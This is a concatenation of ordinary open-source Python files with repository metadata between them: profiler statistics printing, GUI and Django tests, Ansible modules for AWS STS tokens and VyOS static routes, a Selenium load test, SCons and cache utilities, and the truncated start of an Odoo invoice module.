if list:
self.calc_callees()
self.print_call_heading(width, "called...")
for func in list:
if func in self.all_callees:
self.print_call_line(width, func, self.all_callees[func])
else:
self.print_call_line(width, func, {})
print >> self.stream
print >> self.stream
return self
def print_callers(self, *amount):
width, list = self.get_print_list(amount)
if list:
self.print_call_heading(width, "was called by...")
for func in list:
cc, nc, tt, ct, callers = self.stats[func]
self.print_call_line(width, func, callers, "<-")
print >> self.stream
print >> self.stream
return self
def print_call_heading(self, name_size, column_title):
print >> self.stream, "Function ".ljust(name_size) + column_title
# print sub-header only if we have new-style callers
subheader = False
for cc, nc, tt, ct, callers in self.stats.itervalues():
if callers:
value = callers.itervalues().next()
subheader = isinstance(value, tuple)
break
if subheader:
print >> self.stream, " "*name_size + " ncalls tottime cumtime"
def print_call_line(self, name_size, source, call_dict, arrow="->"):
print >> self.stream, func_std_string(source).ljust(name_size) + arrow,
if not call_dict:
print >> self.stream
return
clist = call_dict.keys()
clist.sort()
indent = ""
for func in clist:
name = func_std_string(func)
value = call_dict[func]
if isinstance(value, tuple):
nc, cc, tt, ct = value
if nc != cc:
substats = '%d/%d' % (nc, cc)
else:
substats = '%d' % (nc,)
substats = '%s %s %s %s' % (substats.rjust(7+2*len(indent)),
f8(tt), f8(ct), name)
left_width = name_size + 1
else:
substats = '%s(%r) %s' % (name, value, f8(self.stats[func][3]))
left_width = name_size + 3
print >> self.stream, indent*left_width + substats
indent = " "
def print_title(self):
print >> self.stream, ' ncalls tottime percall cumtime percall',
print >> self.stream, 'filename:lineno(function)'
def print_line(self, func): # hack : should print percentages
cc, nc, tt, ct, callers = self.stats[func]
c = str(nc)
if nc != cc:
c = c + '/' + str(cc)
print >> self.stream, c.rjust(9),
print >> self.stream, f8(tt),
if nc == 0:
print >> self.stream, ' '*8,
else:
print >> self.stream, f8(float(tt)/nc),
print >> self.stream, f8(ct),
if cc == 0:
print >> self.stream, ' '*8,
else:
print >> self.stream, f8(float(ct)/cc),
print >> self.stream, func_std_string(func)
class TupleComp:
"""This class provides a generic function for comparing any two tuples.
Each instance records a list of tuple-indices (from most significant
    to least significant), and sort direction (ascending or descending) for
    each tuple-index. The compare function can then be used as the function
    argument to the system sort() function when a list of tuples needs to be
    sorted in the instance's order."""
def __init__(self, comp_select_list):
self.comp_select_list = comp_select_list
def compare (self, left, right):
for index, direction in self.comp_select_list:
l = left[index]
r = right[index]
if l < r:
return -direction
if l > r:
return direction
return 0
#**************************************************************************
# func_name is a triple (file:string, line:int, name:string)
def func_strip_path(func_name):
filename, line, name = func_name
return os.path.basename(filename), line, name
def func_get_function_name(func):
return func[2]
def func_std_string(func_name): # match what old profile produced
if func_name[:2] == ('~', 0):
# special case for built-in functions
name = func_name[2]
if name.startswith('<') and name.endswith('>'):
return '{%s}' % name[1:-1]
else:
return name
else:
return "%s:%d(%s)" % func_name
#**************************************************************************
# The following functions combine statistics for pairs of functions.
# The bulk of the processing involves correctly handling "call" lists,
# such as callers and callees.
#**************************************************************************
def add_func_stats(target, source):
"""Add together all the stats for two profile entries."""
cc, nc, tt, ct, callers = source
t_cc, t_nc, t_tt, t_ct, t_callers = target
return (cc+t_cc, nc+t_nc, tt+t_tt, ct+t_ct,
add_callers(t_callers, callers))
def add_callers(target, source):
"""Combine two caller lists in a single list."""
new_callers = {}
for func, caller in target.iteritems():
new_callers[func] = caller
for func, caller in source.iteritems():
if func in new_callers:
if isinstance(caller, tuple):
# format used by cProfile
new_callers[func] = tuple([i[0] + i[1] for i in
zip(caller, new_callers[func])])
else:
# format used by profile
new_callers[func] += caller
else:
new_callers[func] = caller
return new_callers
def count_calls(callers):
"""Sum the caller statistics to get total number of calls received."""
nc = 0
for calls in callers.itervalues():
nc += calls
return nc
#**************************************************************************
# The following functions support printing of reports
#**************************************************************************
def f8(x):
return "%8.3f" % x
#**************************************************************************
# Statistics browser added by ESR, April 2001
#**************************************************************************
if __name__ == '__main__':
import cmd
try:
import readline
except ImportError:
pass
class ProfileBrowser(cmd.Cmd):
def __init__(self, profile=None):
cmd.Cmd.__init__(self)
self.prompt = "% "
self.stats = None
self.stream = sys.stdout
if profile is not None:
self.do_read(profile)
def generic(self, fn, line):
args = line.split()
processed = []
for term in args:
try:
processed.append(int(term))
continue
except ValueError:
pass
try:
frac = float(term)
if frac > 1 or frac < 0:
print >> self.stream, "Fraction argument must be in [0, 1]"
continue
processed.append(frac)
continue
except ValueError:
pass
processed.append(term)
if self.stats:
getattr(self.stats, fn)(*processed)
else:
print >> self.stream, "No statistics object is loaded."
return 0
def generic_help(self):
print >> self.stream, "Arguments may be:"
print >> self.stream, "* An integer maximum number of entries to print."
print >> self.stream, "* A decimal fractional number between 0 and 1, controlling"
print >> self.stream, " what fraction of selected entries to print."
print >> self.stream, "* A regular expression; only entries with function names"
print >> self.stream, " that match it are printed."
def do_add(self, line):
if self.stats:
self.stats.add(line)
else:
print >> self.stream, "No statistics object is loaded."
return 0
def help_add(self):
print >> self.stream, "Add profile info from given file to current statistics object."
def do_callees(self, line):
return self.generic('print_callees', line)
def help_callees(self):
print >> self.stream, "Print callees statistics from the current stat object."
self.generic_help()
def do_callers(self, line):
return self.generic('print_callers', line)
def help_callers(self):
print >> self.stream, "Print callers statistics from the current stat object."
self.generic_help()
def do_EOF(self, line):
print >> self.stream, ""
return 1
def help_EOF(self):
print >> self.stream, "Leave the profile brower."
def do_quit(self, line):
return 1
def help_quit(self):
print >> self.stream, "Leave the profile brower."
def do_read(self, line):
if line:
try:
self.stats = Stats(line)
except IOError, args:
print >> self.stream, args[1]
return
except Exception as err:
print >> self.stream, err.__class__.__name__ + ':', err
return
self.prompt = line + "% "
elif len(self.prompt) > 2:
line = self.prompt[:-2]
self.do_read(line)
else:
print >> self.stream, "No statistics object is current -- cannot reload."
return 0
def help_read(self):
print >> self.stream, "Read in profile data from a specified file."
print >> self.stream, "Without argument, reload the current file."
def do_reverse(self, line):
if self.stats:
self.stats.reverse_order()
else:
print >> self.stream, "No statistics object is loaded."
return 0
def help_reverse(self):
print >> self.stream, "Reverse the sort order of the profiling report."
def do_sort(self, line):
if not self.stats:
print >> self.stream, "No statistics object is loaded."
return
abbrevs = self.stats.get_sort_arg_defs()
if line and all((x in abbrevs) for x in line.split()):
self.stats.sort_stats(*line.split())
else:
print >> self.stream, "Valid sort keys (unique prefixes are accepted):"
for (key, value) in Stats.sort_arg_dict_default.iteritems():
print >> self.stream, "%s -- %s" % (key, value[1])
return 0
def help_sort(self):
print >> self.stream, "Sort profile data according to specified keys."
print >> self.stream, "(Typing `sort' without arguments lists valid keys.)"
def complete_sort(self, text, *args):
return [a for a in Stats.sort_arg_dict_default if a.startswith(text)]
def do_stats(self, line):
return self.generic('print_stats', line)
def help_stats(self):
print >> self.stream, "Print statistics from the current stat object."
self.generic_help()
def do_strip(self, line):
if self.stats:
self.stats.strip_dirs()
else:
print >> self.stream, "No statistics object is loaded."
def help_strip(self):
print >> self.stream, "Strip leading path information from filenames in the report."
def help_help(self):
print >> self.stream, "Show help for a given command."
def postcmd(self, stop, line):
if stop:
return stop
return None
import sys
if len(sys.argv) > 1:
initprofile = sys.argv[1]
else:
initprofile = None
try:
browser = ProfileBrowser(initprofile)
print >> browser.stream, "Welcome to the profile statistics browser."
browser.cmdloop()
print >> browser.stream, "Goodbye."
except KeyboardInterrupt:
pass
# That's all, folks.
|
apache-2.0
|
tchx84/sugar-toolkit-gtk3
|
examples/ticket2855.py
|
9
|
1630
|
# Copyright (C) 2007, Red Hat, Inc.
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the
# Free Software Foundation, Inc., 59 Temple Place - Suite 330,
# Boston, MA 02111-1307, USA.
"""
Test the style of toggle and radio buttons inside a palette. The buttons
contains only an icon and should be rendered similarly to the toolbar
controls. Ticket #2855.
"""
from gi.repository import Gtk
from sugar3.graphics.palette import Palette
from sugar3.graphics.icon import Icon
import common
test = common.TestPalette()
palette = Palette('Test radio and toggle')
test.set_palette(palette)
box = Gtk.HBox()
toggle = Gtk.ToggleButton()
icon = Icon(icon_name='go-previous', icon_size=Gtk.IconSize.LARGE_TOOLBAR)
toggle.set_image(icon)
box.pack_start(toggle, False)
toggle.show()
radio = Gtk.RadioButton()
icon = Icon(icon_name='go-next', icon_size=Gtk.IconSize.LARGE_TOOLBAR)
radio.set_image(icon)
radio.set_mode(False)
box.pack_start(radio, False)
radio.show()
palette.set_content(box)
box.show()
if __name__ == '__main__':
common.main(test)
|
lgpl-2.1
|
yati-sagade/RyDyrect
|
django/contrib/messages/tests/fallback.py
|
311
|
6978
|
from django.contrib.messages import constants
from django.contrib.messages.storage.fallback import FallbackStorage, \
CookieStorage
from django.contrib.messages.tests.base import BaseTest
from django.contrib.messages.tests.cookie import set_cookie_data, \
stored_cookie_messages_count
from django.contrib.messages.tests.session import set_session_data, \
stored_session_messages_count
class FallbackTest(BaseTest):
storage_class = FallbackStorage
def get_request(self):
self.session = {}
request = super(FallbackTest, self).get_request()
request.session = self.session
return request
def get_cookie_storage(self, storage):
return storage.storages[-2]
def get_session_storage(self, storage):
return storage.storages[-1]
def stored_cookie_messages_count(self, storage, response):
return stored_cookie_messages_count(self.get_cookie_storage(storage),
response)
def stored_session_messages_count(self, storage, response):
return stored_session_messages_count(self.get_session_storage(storage))
def stored_messages_count(self, storage, response):
"""
Return the storage totals from both cookie and session backends.
"""
total = (self.stored_cookie_messages_count(storage, response) +
self.stored_session_messages_count(storage, response))
return total
def test_get(self):
request = self.get_request()
storage = self.storage_class(request)
cookie_storage = self.get_cookie_storage(storage)
# Set initial cookie data.
example_messages = [str(i) for i in range(5)]
set_cookie_data(cookie_storage, example_messages)
# Overwrite the _get method of the fallback storage to prove it is not
# used (it would cause a TypeError: 'NoneType' object is not callable).
self.get_session_storage(storage)._get = None
# Test that the message actually contains what we expect.
self.assertEqual(list(storage), example_messages)
def test_get_empty(self):
request = self.get_request()
storage = self.storage_class(request)
# Overwrite the _get method of the fallback storage to prove it is not
# used (it would cause a TypeError: 'NoneType' object is not callable).
self.get_session_storage(storage)._get = None
# Test that the message actually contains what we expect.
self.assertEqual(list(storage), [])
def test_get_fallback(self):
request = self.get_request()
storage = self.storage_class(request)
cookie_storage = self.get_cookie_storage(storage)
session_storage = self.get_session_storage(storage)
# Set initial cookie and session data.
example_messages = [str(i) for i in range(5)]
set_cookie_data(cookie_storage, example_messages[:4] +
[CookieStorage.not_finished])
set_session_data(session_storage, example_messages[4:])
# Test that the message actually contains what we expect.
self.assertEqual(list(storage), example_messages)
def test_get_fallback_only(self):
request = self.get_request()
storage = self.storage_class(request)
cookie_storage = self.get_cookie_storage(storage)
session_storage = self.get_session_storage(storage)
# Set initial cookie and session data.
example_messages = [str(i) for i in range(5)]
set_cookie_data(cookie_storage, [CookieStorage.not_finished],
encode_empty=True)
set_session_data(session_storage, example_messages)
# Test that the message actually contains what we expect.
self.assertEqual(list(storage), example_messages)
def test_flush_used_backends(self):
request = self.get_request()
storage = self.storage_class(request)
cookie_storage = self.get_cookie_storage(storage)
session_storage = self.get_session_storage(storage)
# Set initial cookie and session data.
set_cookie_data(cookie_storage, ['cookie', CookieStorage.not_finished])
set_session_data(session_storage, ['session'])
# When updating, previously used but no longer needed backends are
# flushed.
response = self.get_response()
list(storage)
storage.update(response)
session_storing = self.stored_session_messages_count(storage, response)
self.assertEqual(session_storing, 0)
def test_no_fallback(self):
"""
Confirms that:
(1) A short number of messages whose data size doesn't exceed what is
allowed in a cookie will all be stored in the CookieBackend.
(2) If the CookieBackend can store all messages, the SessionBackend
won't be written to at all.
"""
storage = self.get_storage()
response = self.get_response()
# Overwrite the _store method of the fallback storage to prove it isn't
# used (it would cause a TypeError: 'NoneType' object is not callable).
self.get_session_storage(storage)._store = None
for i in range(5):
storage.add(constants.INFO, str(i) * 100)
storage.update(response)
cookie_storing = self.stored_cookie_messages_count(storage, response)
self.assertEqual(cookie_storing, 5)
session_storing = self.stored_session_messages_count(storage, response)
self.assertEqual(session_storing, 0)
def test_session_fallback(self):
"""
Confirms that, if the data exceeds what is allowed in a cookie,
messages which did not fit are stored in the SessionBackend.
"""
storage = self.get_storage()
response = self.get_response()
        # see the comment in CookieTest.test_cookie_max_length
msg_size = int((CookieStorage.max_cookie_size - 54) / 4.5 - 37)
for i in range(5):
storage.add(constants.INFO, str(i) * msg_size)
storage.update(response)
cookie_storing = self.stored_cookie_messages_count(storage, response)
self.assertEqual(cookie_storing, 4)
session_storing = self.stored_session_messages_count(storage, response)
self.assertEqual(session_storing, 1)
def test_session_fallback_only(self):
"""
Confirms that large messages, none of which fit in a cookie, are stored
in the SessionBackend (and nothing is stored in the CookieBackend).
"""
storage = self.get_storage()
response = self.get_response()
storage.add(constants.INFO, 'x' * 5000)
storage.update(response)
cookie_storing = self.stored_cookie_messages_count(storage, response)
self.assertEqual(cookie_storing, 0)
session_storing = self.stored_session_messages_count(storage, response)
self.assertEqual(session_storing, 1)
|
bsd-3-clause
|
privateip/ansible
|
lib/ansible/modules/cloud/amazon/sts_session_token.py
|
48
|
5459
|
#!/usr/bin/python
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
ANSIBLE_METADATA = {'status': ['stableinterface'],
'supported_by': 'committer',
'version': '1.0'}
DOCUMENTATION = '''
---
module: sts_session_token
short_description: Obtain a session token from the AWS Security Token Service
description:
- Obtain a session token from the AWS Security Token Service
version_added: "2.2"
author: Victor Costan (@pwnall)
options:
duration_seconds:
description:
- The duration, in seconds, of the session token. See http://docs.aws.amazon.com/STS/latest/APIReference/API_GetSessionToken.html#API_GetSessionToken_RequestParameters for acceptable and default values.
required: false
default: null
mfa_serial_number:
description:
- The identification number of the MFA device that is associated with the user who is making the GetSessionToken call.
required: false
default: null
mfa_token:
description:
- The value provided by the MFA device, if the trust policy of the user requires MFA.
required: false
default: null
notes:
- In order to use the session token in a following playbook task you must pass the I(access_key), I(access_secret) and I(access_token).
extends_documentation_fragment:
- aws
- ec2
requirements:
- boto3
- botocore
- python >= 2.6
'''
RETURN = """
sts_creds:
description: The Credentials object returned by the AWS Security Token Service
returned: always
type: list
sample:
access_key: ASXXXXXXXXXXXXXXXXXX
expiration: "2016-04-08T11:59:47+00:00"
secret_key: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
session_token: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
changed:
description: True if obtaining the credentials succeeds
type: bool
returned: always
"""
EXAMPLES = '''
# Note: These examples do not set authentication details, see the AWS Guide for details.
# Get a session token (more details: http://docs.aws.amazon.com/STS/latest/APIReference/API_GetSessionToken.html)
sts_session_token:
duration: 3600
register: session_credentials
# Use the session token obtained above to tag an instance in account 123456789012
ec2_tag:
aws_access_key: "{{ session_credentials.sts_creds.access_key }}"
aws_secret_key: "{{ session_credentials.sts_creds.secret_key }}"
security_token: "{{ session_credentials.sts_creds.session_token }}"
resource: i-xyzxyz01
state: present
tags:
MyNewTag: value
'''
try:
import boto3
from botocore.exceptions import ClientError
HAS_BOTO3 = True
except ImportError:
HAS_BOTO3 = False
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.ec2 import boto3_conn, ec2_argument_spec, get_aws_connection_info
def normalize_credentials(credentials):
access_key = credentials.get('AccessKeyId', None)
secret_key = credentials.get('SecretAccessKey', None)
session_token = credentials.get('SessionToken', None)
expiration = credentials.get('Expiration', None)
return {
'access_key': access_key,
'secret_key': secret_key,
'session_token': session_token,
'expiration': expiration
}
def get_session_token(connection, module):
duration_seconds = module.params.get('duration_seconds')
mfa_serial_number = module.params.get('mfa_serial_number')
mfa_token = module.params.get('mfa_token')
changed = False
args = {}
if duration_seconds is not None:
args['DurationSeconds'] = duration_seconds
if mfa_serial_number is not None:
args['SerialNumber'] = mfa_serial_number
if mfa_token is not None:
args['TokenCode'] = mfa_token
try:
response = connection.get_session_token(**args)
changed = True
except ClientError as e:
module.fail_json(msg=e)
credentials = normalize_credentials(response.get('Credentials', {}))
module.exit_json(changed=changed, sts_creds=credentials)
def main():
argument_spec = ec2_argument_spec()
argument_spec.update(
dict(
duration_seconds = dict(required=False, default=None, type='int'),
mfa_serial_number = dict(required=False, default=None),
mfa_token = dict(required=False, default=None)
)
)
module = AnsibleModule(argument_spec=argument_spec)
if not HAS_BOTO3:
module.fail_json(msg='boto3 and botocore are required.')
region, ec2_url, aws_connect_kwargs = get_aws_connection_info(module, boto3=True)
if region:
connection = boto3_conn(module, conn_type='client', resource='sts', region=region, endpoint=ec2_url, **aws_connect_kwargs)
else:
module.fail_json(msg="region must be specified")
get_session_token(connection, module)
if __name__ == '__main__':
main()
|
gpl-3.0
|
lesiavl/selenium_perfomance_tests
|
utender_load/create_tender.py
|
4
|
2484
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from selenium import webdriver
# NoSuchElementException and sleep are used below; they may also be
# re-exported by page_objects, but explicit imports keep the script
# self-contained.
from selenium.common.exceptions import NoSuchElementException
from page_objects import *
from datetime import datetime
from time import sleep
import unittest
import argparse
tender_id = None
class SeleniumMixin(unittest.TestCase):
    def assertElementIsPresentById(self, elem_id):
try:
self.driver.find_element_by_id(elem_id)
except NoSuchElementException as error:
self.fail(error)
class TestCreateTender(SeleniumMixin):
def setUp(self):
self.driver = webdriver.Chrome()
self.driver.get(broker['url'])
self.driver.set_window_size(1200, 1000)
self.login_page_owner = LoginPage(
owner_users['email'], owner_users['password'], self.driver
)
self.create_tender_page = CreateTenderPage(self.driver)
self.find_tender = FindTenderPage(self.driver)
def test_create_tender(self):
self.login_page_owner.login_as_owner()
self.driver.get(create_tender_url)
self.create_tender_page.create_tender()
is_found = False
for i in range(1, 10):
try:
given_tender_id = self.find_tender.get_tender_id()
print given_tender_id
if given_tender_id:
with open('load_results_create.txt', 'a') as f:
f.write(
'Tender_Owner created tender with {}, finished at {} ------------------ PASSED\n'.format(
given_tender_id, datetime.now())
)
is_found = True
break
            except (NoSuchElementException, UnicodeEncodeError):
sleep(30)
self.driver.refresh()
self.driver.execute_script("window.scrollTo(0, 1582);")
if not is_found:
with open('load_results_create.txt', 'a') as f:
f.write('Tender_Owner did NOT create tender, finished at {} ------------ FAILED\n'.format(
datetime.now())
)
return False
def tearDown(self):
self.driver.close()
if __name__ == '__main__':
parser = argparse.ArgumentParser(prog='create_tender')
suite = unittest.TestSuite()
suite.addTest(TestCreateTender("test_create_tender"))
runner = unittest.TextTestRunner()
runner.run(suite)
|
apache-2.0
|
chriskmanx/qmole
|
QMOLEDEV/node/tools/scons/scons-local-1.2.0/SCons/Tool/icl.py
|
12
|
1840
|
"""engine.SCons.Tool.icl
Tool-specific initialization for the Intel C/C++ compiler.
There normally shouldn't be any need to import this module directly.
It will usually be imported through the generic SCons.Tool.Tool()
selection method.
"""
#
# Copyright (c) 2001, 2002, 2003, 2004, 2005, 2006, 2007, 2008 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "src/engine/SCons/Tool/icl.py 3842 2008/12/20 22:59:52 scons"
import SCons.Tool.intelc
# This has been completely superseded by intelc.py, which can
# handle both Windows and Linux versions.
def generate(*args, **kw):
"""Add Builders and construction variables for icl to an Environment."""
return apply(SCons.Tool.intelc.generate, args, kw)
def exists(*args, **kw):
return apply(SCons.Tool.intelc.exists, args, kw)
|
gpl-3.0
|
benthomasson/ansible
|
lib/ansible/modules/network/vyos/vyos_static_route.py
|
11
|
7392
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2017, Ansible by Red Hat, inc
#
# This file is part of Ansible by Red Hat
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['preview'],
'supported_by': 'core'}
DOCUMENTATION = """
---
module: vyos_static_route
version_added: "2.4"
author: "Trishna Guha (@trishnag)"
short_description: Manage static IP routes on Vyatta VyOS network devices
description:
- This module provides declarative management of static
IP routes on Vyatta VyOS network devices.
options:
prefix:
description:
- Network prefix of the static route.
      The C(mask) param is ignored when C(prefix) is provided
      in the C(prefix/mask) format.
mask:
description:
- Network prefix mask of the static route.
next_hop:
description:
- Next hop IP of the static route.
admin_distance:
description:
- Admin distance of the static route.
aggregate:
description: List of static route definitions
purge:
description:
- Purge static routes not defined in the aggregates parameter.
default: no
state:
description:
- State of the static route configuration.
default: present
choices: ['present', 'absent']
"""
EXAMPLES = """
- name: configure static route
vyos_static_route:
prefix: 192.168.2.0
mask: 24
next_hop: 10.0.0.1
- name: configure static route prefix/mask
vyos_static_route:
prefix: 192.168.2.0/16
next_hop: 10.0.0.1
- name: remove configuration
vyos_static_route:
prefix: 192.168.2.0
mask: 16
next_hop: 10.0.0.1
state: absent
- name: configure aggregates of static routes
vyos_static_route:
aggregate:
- { prefix: 192.168.2.0, mask: 24, next_hop: 10.0.0.1 }
- { prefix: 192.168.3.0, mask: 16, next_hop: 10.0.2.1 }
- { prefix: 192.168.3.0/16, next_hop: 10.0.2.1 }
"""
RETURN = """
commands:
description: The list of configuration mode commands to send to the device
returned: always
type: list
sample:
- set protocols static route 192.168.2.0/16 next-hop 10.0.0.1
"""
import re
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.vyos import get_config, load_config
from ansible.module_utils.vyos import vyos_argument_spec, check_args
def spec_to_commands(updates, module):
commands = list()
want, have = updates
for w in want:
prefix = w['prefix']
mask = w['mask']
next_hop = w['next_hop']
admin_distance = w['admin_distance']
state = w['state']
del w['state']
if state == 'absent' and w in have:
commands.append('delete protocols static route %s/%s' % (prefix, mask))
elif state == 'present' and w not in have:
cmd = 'set protocols static route %s/%s next-hop %s' % (prefix, mask, next_hop)
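            # admin_distance is handled as a string throughout this module
            # ('None' when unset), hence the string comparison below.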
if admin_distance != 'None':
cmd += ' distance %s' % (admin_distance)
commands.append(cmd)
return commands
def config_to_dict(module):
data = get_config(module)
obj = []
for line in data.split('\n'):
if line.startswith('set protocols static route'):
match = re.search(r'static route (\S+)', line, re.M)
prefix = match.group(1).split('/')[0]
mask = match.group(1).split('/')[1]
if 'next-hop' in line:
match_hop = re.search(r'next-hop (\S+)', line, re.M)
next_hop = match_hop.group(1).strip("'")
match_distance = re.search(r'distance (\S+)', line, re.M)
if match_distance is not None:
admin_distance = match_distance.group(1)[1:-1]
else:
admin_distance = None
if admin_distance is not None:
obj.append({'prefix': prefix,
'mask': mask,
'next_hop': next_hop,
'admin_distance': admin_distance})
else:
obj.append({'prefix': prefix,
'mask': mask,
'next_hop': next_hop,
'admin_distance': 'None'})
return obj
def map_params_to_obj(module):
obj = []
if 'aggregate' in module.params and module.params['aggregate']:
for c in module.params['aggregate']:
d = c.copy()
if '/' in d['prefix']:
d['mask'] = d['prefix'].split('/')[1]
d['prefix'] = d['prefix'].split('/')[0]
if 'state' not in d:
d['state'] = module.params['state']
if 'admin_distance' not in d:
d['admin_distance'] = str(module.params['admin_distance'])
obj.append(d)
else:
prefix = module.params['prefix'].strip()
if '/' in prefix:
mask = prefix.split('/')[1]
prefix = prefix.split('/')[0]
else:
mask = module.params['mask'].strip()
next_hop = module.params['next_hop'].strip()
admin_distance = str(module.params['admin_distance'])
state = module.params['state']
obj.append({
'prefix': prefix,
'mask': mask,
'next_hop': next_hop,
'admin_distance': admin_distance,
'state': state
})
return obj
def main():
""" main entry point for module execution
"""
argument_spec = dict(
prefix=dict(type='str'),
mask=dict(type='str'),
next_hop=dict(type='str'),
admin_distance=dict(type='int'),
aggregate=dict(type='list'),
purge=dict(type='bool'),
state=dict(default='present', choices=['present', 'absent'])
)
argument_spec.update(vyos_argument_spec)
required_one_of = [['aggregate', 'prefix']]
required_together = [['prefix', 'next_hop']]
mutually_exclusive = [['aggregate', 'prefix']]
    module = AnsibleModule(argument_spec=argument_spec,
                           required_one_of=required_one_of,
                           required_together=required_together,
                           mutually_exclusive=mutually_exclusive,
                           supports_check_mode=True)
warnings = list()
check_args(module, warnings)
result = {'changed': False}
if warnings:
result['warnings'] = warnings
want = map_params_to_obj(module)
have = config_to_dict(module)
commands = spec_to_commands((want, have), module)
result['commands'] = commands
if commands:
commit = not module.check_mode
load_config(module, commands, commit=commit)
result['changed'] = True
module.exit_json(**result)
if __name__ == '__main__':
main()
|
gpl-3.0
|
zploskey/servo
|
tests/wpt/web-platform-tests/tools/py/py/_path/cacheutil.py
|
278
|
3333
|
"""
This module contains multithread-safe cache implementations.
All Caches have
getorbuild(key, builder)
delentry(key)
methods and allow configuration when instantiating the cache class.
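
A minimal usage sketch (illustrative only; BuildcostAccessCache is defined
later in this module):

    cache = BuildcostAccessCache(maxentries=64)
    value = cache.getorbuild("answer", lambda: 42)   # builds and caches 42
    value = cache.getorbuild("answer", lambda: -1)   # returns the cached 42
    cache.delentry("answer")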
"""
from time import time as gettime
class BasicCache(object):
def __init__(self, maxentries=128):
self.maxentries = maxentries
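        # number of entries kept after a prune pass (7/8 of maxentries)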
self.prunenum = int(maxentries - maxentries/8)
self._dict = {}
def clear(self):
self._dict.clear()
def _getentry(self, key):
return self._dict[key]
def _putentry(self, key, entry):
self._prunelowestweight()
self._dict[key] = entry
def delentry(self, key, raising=False):
try:
del self._dict[key]
except KeyError:
if raising:
raise
def getorbuild(self, key, builder):
try:
entry = self._getentry(key)
except KeyError:
entry = self._build(key, builder)
self._putentry(key, entry)
return entry.value
def _prunelowestweight(self):
""" prune out entries with lowest weight. """
numentries = len(self._dict)
if numentries >= self.maxentries:
# evict according to entry's weight
items = [(entry.weight, key)
for key, entry in self._dict.items()]
items.sort()
index = numentries - self.prunenum
if index > 0:
for weight, key in items[:index]:
# in MT situations the element might be gone
self.delentry(key, raising=False)
class BuildcostAccessCache(BasicCache):
""" A BuildTime/Access-counting cache implementation.
the weight of a value is computed as the product of
num-accesses-of-a-value * time-to-build-the-value
The values with the least such weights are evicted
    if the cache maxentries threshold is exceeded.
For implementation flexibility more than one object
might be evicted at a time.
"""
# time function to use for measuring build-times
def _build(self, key, builder):
start = gettime()
val = builder()
end = gettime()
return WeightedCountingEntry(val, end-start)
class WeightedCountingEntry(object):
def __init__(self, value, oneweight):
self._value = value
self.weight = self._oneweight = oneweight
def value(self):
self.weight += self._oneweight
return self._value
value = property(value)
class AgingCache(BasicCache):
""" This cache prunes out cache entries that are too old.
"""
def __init__(self, maxentries=128, maxseconds=10.0):
super(AgingCache, self).__init__(maxentries)
self.maxseconds = maxseconds
def _getentry(self, key):
entry = self._dict[key]
if entry.isexpired():
self.delentry(key)
raise KeyError(key)
return entry
def _build(self, key, builder):
val = builder()
entry = AgingEntry(val, gettime() + self.maxseconds)
return entry
class AgingEntry(object):
def __init__(self, value, expirationtime):
self.value = value
self.weight = expirationtime
def isexpired(self):
t = gettime()
return t >= self.weight
|
mpl-2.0
|
SCSSG/Odoo-SCS
|
addons/account/account_invoice.py
|
3
|
79288
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import itertools
from lxml import etree
from openerp import models, fields, api, _
from openerp.exceptions import except_orm, Warning, RedirectWarning
from openerp.tools import float_compare
